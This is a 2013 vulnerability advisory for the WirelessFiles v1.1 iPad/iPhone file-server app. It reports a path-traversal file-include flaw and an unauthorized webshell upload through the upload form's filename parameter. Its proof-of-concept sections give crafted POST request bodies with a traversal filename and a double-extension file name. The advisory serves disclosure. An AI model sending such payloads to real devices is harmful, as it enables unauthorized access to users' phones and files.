Title: ====== WirelessFiles v1.1 iPad iPhone - Multiple Web Vulnerabilities Date: ===== 2013-02-06 References: =========== http://www.vulnerability-lab.com/get_content.php?id=847 VL-ID: ===== 848 Common Vulnerability Scoring System: ==================================== 7.5 Introduction: ============= This application starts a web server on your device and allows downloads and uploads of any files from it using any browser on any other computer or device. No cables, drivers or clients are necessary, just a browser. Right from this application you can send these files to any other application ready to accept this file type. Or, you can send the files to Wireless Files for further download to your computer. There is no problems with national file names. With this program You have web access to photos and videos on your device. Show your photos in a nice Web Album on big screen without cables and so on. For that, you need to enter your web-server from any computer using LAN or WWAN address. Just type one of the indicated addresses in the address bar of your browser (Internet Explorer, Mozilla Firefox, Safari or any others). Also, you can start WirelessFiles on one device, enter the web-server in your browser from another device, and transfer your photos,for example,to the first device, and then put them in Camera Roll. (The transfer of photos to and from Camera Roll is available only in iOS 6 and up). For all this to work, you need to have a working connection to the network where your device is located. For LAN,It usually works right on the spot, if you have a modem or Wi-Fi router. If you have an AccessPoint (AP) connected to your modem or router, you will need to switch the AP to the bridge mode in order to join the local network and Wi-Fi network into one. In case you experience problems with connection, contact a specialist – this can be easily adjusted. It’s much harder with WWAN. It’s a network access point provided by your cell network operator. As a rule, you cannot connect your computer to your device using WWAN. Still, if Internet access on your computer is provided by the same operator, everything will get connected and running. The application wouldn’t work in the background, so it switches off autoblocking while running. Any unexpected calls will interrupt your file transfer. By default, the application allows storing a limited number of files – no more than 3 of them; with the size of each not more than 10 MB. But you can remove all these limitations at the minimal price of $0.99 / €0.89. Second limitation - program show only 10 first photos in webalbum, remove this limitation - $0.99 / €0.89. Still, if something isn’t working, DO NOT buy removal of restrictions – this will not improve operability of the system itself. Pay ONLY in case everything works, and you need to store more than 3 files or larger size. The application include basic protection of the web-server from unauthorized access. (Copy of the Homepage: https://itunes.apple.com/de/app/wirelessfiles/id573161053 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the mobile WirelessFiles v1.1 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-06: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: WirelessFiles Application - (iPad & iPhone) 1.1 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A local file include web vulnerability via POST request method is detected in the mobile WirelessFiles v1.1 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. 1.1 The main vulnerbility is located in the upload file submit formular of the webserver (http://192.168.0.10/) when processing to load a manipulated filename via POST. The execution of the injected path or file request will occur when the attacker is watching the file index listing. 1.2 Attackers can also unauthorized implement mobile webshells by using a double filename extension (bild.js.php.jpg) when processing to upload (submit) via POST request method. The attacker uploads a file with a double extension and access the file in the secound step via directory webserver listing to compromise the apple iphone or ipad. Exploitation of the local file include web vulnerability does not require user interaction but a low privileged user account (standard pass blank). Successful exploitation of the local web vulnerability results in ipad or iphone compromise via file include attack. Vulnerable Application(s): [+] WirelessFiles - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload via Submit (Web Server) [Remote] Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Filename - Listing [+] Webalbum Filename - Listing Proof of Concept: ================= 1.1 The vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction. For demonstration or reproduce ... Local File Include - PoC (POST) POSTDATA =-----------------------------200962619920015 Content-Disposition: form-data; name="value"; filename="../../../../cmd>home>tmp.png" # < Include Path & File Content-Type: image/png -- Authorization=Digest username="ben37", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/", response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3" Review: Filename - (Upload) Listing
File Name
Date and Time
Size
<../../../../cmd>home>tmp.png?%00">%20%20%20%20
1.2 The vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction. For demonstration or reproduce ... Unauthroized File Upload/Access (Webshell) POSTDATA =-----------------------------200962619920015 Content-Disposition: form-data; name="value"; filename="hacking.js.php.jpg" # < Include File with multiple file extensions Content-Type: image/png -- Authorization=Digest username="ben38", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/", response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3" Review: Filename - (Upload) Listing
File Name
Date and Time
Size
%20%20%20%20
Risk: ===== The security risk of the local file include web vulnerability and unauthorized file upload/access bug are estimated as high(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com